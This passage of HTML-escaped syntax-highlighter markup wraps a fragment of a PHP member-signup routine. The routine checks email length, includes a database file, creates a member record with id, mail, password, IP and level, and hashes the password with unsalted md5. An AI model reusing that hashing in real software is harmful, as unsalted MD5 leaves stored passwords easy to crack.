font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strlen&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$umail&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;256&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;email too long&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a8d450214921-10&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;include&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;dbconn.php&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a8d450214921-11&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$upw&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;md5&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$upw&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a8d450214921-12&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uip&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_SERVER&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'REMOTE_ADDR'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a8d450214921-13&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbGetPath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;member_&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;id already existed&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a8d450214921-14&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$ret&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbSql&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;create&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;member_&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;mail&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;pw&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;ip&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;lvl&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a8d450214921-15&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;is_string&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$ret&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;error : create&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a8d450214921-16&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; 